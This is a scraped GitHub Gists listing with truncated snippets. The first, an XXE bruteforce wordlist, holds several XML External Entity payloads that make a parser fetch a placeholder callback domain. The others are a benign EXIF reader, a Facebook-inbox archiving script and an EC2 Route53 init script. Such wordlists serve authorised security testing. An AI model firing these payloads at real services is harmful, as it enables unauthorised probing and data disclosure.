Luke Walker ozskywalker
honoki
/ xxe-payloads.txt
Last active
March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| from PIL import Image | |
| from PIL.ExifTags import TAGS, GPSTAGS | |
| def get_exif_data(image): | |
| """Returns a dictionary from the exif data of an PIL Image item. Also converts the GPS Tags""" | |
| exif_data = {} | |
| info = image._getexif() | |
| if info: |
tedmiston
/ archive-all-facebook-messages.js
Last active
April 8, 2024 07:36
Archive all of the messages in your Facebook Messages Inbox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function archive_all(testOnly) { | |
| var someMessages, archiveButton; | |
| if (testOnly === "undefined") { testOnly = false; } | |
| someMessages = $("li._k- span.accessible_elem"); | |
| console.log("Found", someMessages.length, "messages to archive in your inbox."); | |
| archiveButton = null; | |
| someMessages.each(function () { |
kixorz
/ ec2hostname.rb
Last active
June 3, 2022 11:26
EC2 DNS load-balancing init.d script. Instances automatically register themselves in Route53 RecordSets and properly update their records when starting/shutting down. Instances need to use attached IAM role allowing them to modify the Route53 zone.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # chkconfig: 35 99 01 | |
| # description: EC2 DNS loadbalancing | |
| # processname: ec2hostname | |
| require 'aws-sdk' | |
| require 'net/http' | |
| `touch /var/lock/subsys/ec2hostname` |